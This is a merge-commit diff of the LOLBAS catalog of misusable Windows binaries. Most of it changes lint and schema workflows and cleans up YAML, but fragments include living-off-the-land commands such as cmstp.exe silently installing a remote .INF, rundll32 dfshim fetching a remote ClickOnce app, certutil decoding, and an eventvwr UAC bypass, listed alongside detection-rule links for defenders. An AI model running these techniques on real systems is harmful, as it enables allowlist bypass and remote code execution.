Merge branch 'master' into alias_introduction

This commit is contained in:
Conor Richard 2022-09-15 13:54:50 -04:00 committed by GitHub
commit 3347e43b3f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
170 changed files with 622 additions and 602 deletions

8
.github/.yamllint vendored
View File

@ -4,12 +4,12 @@ yaml-files:
- '*.yml' - '*.yml'
rules: rules:
new-line-at-end-of-file: new-line-at-end-of-file:
level: warning level: error
trailing-spaces: trailing-spaces:
level: warning level: error
line-length: line-length:
level: warning level: warning
new-lines: new-lines:
level: warning level: error
indentation: indentation:
level: warning level: error

View File

@ -16,7 +16,7 @@ jobs:
- name: Change .yml to .md - name: Change .yml to .md
run: | run: |
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
mv yml/OSBinaries yml/Binaries mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts mv yml/OSScripts yml/Scripts

View File

@ -1,19 +1,35 @@
--- ---
name: YAML Lint name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: on: [push,pull_request]
push:
branches:
- master
pull_request:
branches:
- master
jobs: jobs:
lintFiles: lintFiles:
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- uses: actions/checkout@v1 - uses: actions/checkout@v3
- name: yaml-lint - name: yaml-lint
uses: ibiqlik/action-yamllint@v3 uses: ibiqlik/action-yamllint@v3
with: with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint config_file: .github/.yamllint
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

35
.github/yaml-lint-reviewdog.yml.bak vendored Normal file
View File

@ -0,0 +1,35 @@
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run yamllint
uses: reviewdog/action-yamllint@v1
with:
level: error
reporter: github-pr-review # Change reporter.
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

View File

@ -23,4 +23,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Bart - Person: Bart
Handle: '@bartblaze' Handle: '@bartblaze'
---

View File

@ -15,4 +15,3 @@ Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe' - Path: '%localappdata%\Whatsapp\Update.exe'
Detection: Detection:
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---

View File

@ -25,4 +25,3 @@ Acknowledgement:
Handle: '@@vysecurity' Handle: '@@vysecurity'
- Person: Adam (Internals) - Person: Adam (Internals)
Handle: '@Hexacorn' Handle: '@Hexacorn'
---

118
YML-Schema.yml Normal file
View File

@ -0,0 +1,118 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'

View File

@ -8,6 +8,8 @@ Created: YYYY-MM-DD (date the person created this file)
Commands: Commands:
- Command: The command - Command: The command
Description: Description of the command Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase Usecase: A description of the usecase
Category: Execute Category: Execute
Privileges: Required privs Privileges: Required privs

View File

@ -20,4 +20,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Wade Hickey - Person: Wade Hickey
Handle: '@notwhickey' Handle: '@notwhickey'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: cpl - Person: cpl
Handle: '@cpl3h' Handle: '@cpl3h'
---

View File

@ -23,7 +23,7 @@ Detection:
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources: Resources:
- Link: https://freddiebarrsmith.com/at.txt - Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
Acknowledgement: Acknowledgement:
- Person: 'Freddie Barr-Smith' - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
---

View File

@ -14,8 +14,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
@ -27,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
---

View File

@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@aionescu' Handle: '@aionescu'
- Person: Asif Matadar - Person: Asif Matadar
Handle: '@d1r4c' Handle: '@d1r4c'
---

View File

@ -46,7 +46,7 @@ Detection:
- IOC: bitsadmin creates new files - IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream - IOC: bitsadmin adds data to alternate data stream
Resources: Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement: Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@carnal0wnage' Handle: '@carnal0wnage'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ensar Samil - Person: Ensar Samil
Handle: '@sblmsrsn' Handle: '@sblmsrsn'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: David Middlehurst - Person: David Middlehurst
Handle: '@dtmsecurity' Handle: '@dtmsecurity'
---

View File

@ -39,7 +39,7 @@ Commands:
Privileges: User Privileges: User
MitreID: T1140 MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures Usecase: Decode files to evade defensive measures
Category: Decode Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Lior Adar - Person: Lior Adar
---

View File

@ -21,8 +21,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
@ -34,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: r0lan - Person: r0lan
Handle: '@yeyint_mth' Handle: '@yeyint_mth'
---

View File

@ -14,8 +14,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
Resources: Resources:
@ -24,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

View File

@ -23,4 +23,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

View File

@ -14,15 +14,13 @@ Commands:
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
@ -44,4 +42,3 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@NickTyrer' Handle: '@NickTyrer'
---

View File

@ -29,4 +29,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
---

View File

@ -24,4 +24,3 @@ Acknowledgement:
Handle: '@hexacorn' Handle: '@hexacorn'
- Person: Wietze - Person: Wietze
Handle: '@wietze' Handle: '@wietze'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

View File

@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
---

View File

@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Gal Kristal - Person: Gal Kristal
Handle: '@gal_kristal' Handle: '@gal_kristal'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@tim8288' Handle: '@tim8288'
- Person: Hai Vaknin - Person: Hai Vaknin
Handle: '@vakninhai' Handle: '@vakninhai'
---

View File

@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

View File

@ -32,4 +32,3 @@ Acknowledgement:
Handle: '@dim0x69' Handle: '@dim0x69'
- Person: Nikhil SamratAshok - Person: Nikhil SamratAshok
Handle: '@nikhil_mitt' Handle: '@nikhil_mitt'
---

View File

@ -66,5 +66,4 @@ Acknowledgement:
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Mike Cary - Person: Mike Cary
Handle: 'grayfold3d' Handle: '@grayfold3d'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: eventvwr.exe - Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass Category: UAC Bypass
Privileges: User Privileges: User
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@enigma0x3' Handle: '@enigma0x3'
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---

View File

@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@infosecn1nja' Handle: '@infosecn1nja'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@CyberRaiju' Handle: '@CyberRaiju'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Extexport.exe Name: Extexport.exe
Description: Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Extrac32.exe Name: Extrac32.exe
Description: Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -54,4 +54,3 @@ Acknowledgement:
Handle: '@VakninHai' Handle: '@VakninHai'
- Person: Tamir Yehuda - Person: Tamir Yehuda
Handle: '@tim8288' Handle: '@tim8288'
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Findstr.exe Name: Findstr.exe
Description: Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -45,4 +45,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -28,4 +28,3 @@ Acknowledgement:
Handle: '@Ocelotty6669' Handle: '@Ocelotty6669'
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Carlos Perez - Person: Carlos Perez
Handle: '@Carlos_Perez' Handle: '@Carlos_Perez'
---

View File

@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@vector_sec' Handle: '@vector_sec'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -38,4 +38,3 @@ Acknowledgement:
Handle: '' Handle: ''
- Person: Amit Serper - Person: Amit Serper
Handle: '@0xAmit' Handle: '@0xAmit'
---

View File

@ -176,4 +176,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jesus Galvez - Person: Jesus Galvez
Handle: Handle:
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -35,4 +35,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -20,4 +20,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Wade Hickey - Person: Wade Hickey
Handle: '@notwhickey' Handle: '@notwhickey'
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Ie4uinit.exe Name: Ie4uinit.exe
Description: Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -17,6 +17,7 @@ Commands:
Category: Compile Category: Compile
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10,7
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai' Handle: '@VakninHai'
- Person: Lior Adar - Person: Lior Adar
Handle: Handle:
---

View File

@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Kyle Hanslovan - Person: Kyle Hanslovan
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -39,4 +39,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
---

View File

@ -40,4 +40,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@gN3mes1s' Handle: '@gN3mes1s'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@FortyNorthSec' Handle: '@FortyNorthSec'
- Person: Bank Security - Person: Bank Security
Handle: '@Bank_Security' Handle: '@Bank_Security'
---

View File

@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@bohops' Handle: '@bohops'
- Person: clem - Person: clem
Handle: '@clavoillotte' Handle: '@clavoillotte'
---

View File

@ -53,4 +53,3 @@ Acknowledgement:
Handle: '' Handle: ''
- Person: Cedric - Person: Cedric
Handle: '@th3c3dr1c' Handle: '@th3c3dr1c'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml - Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file. Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code Usecase: Compile and run code
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -77,4 +77,3 @@ Acknowledgement:
Handle: '@Cneelis' Handle: '@Cneelis'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

View File

@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting Usecase: Execute code bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

View File

@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -51,4 +51,3 @@ Acknowledgement:
Handle: '@netbiosX' Handle: '@netbiosX'
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
---

View File

@ -34,4 +34,3 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
---

View File

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Adam - Person: Adam
Handle: '@Hexacorn' Handle: '@Hexacorn'
---

View File

@ -19,4 +19,3 @@ Detection:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

View File

@ -21,4 +21,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
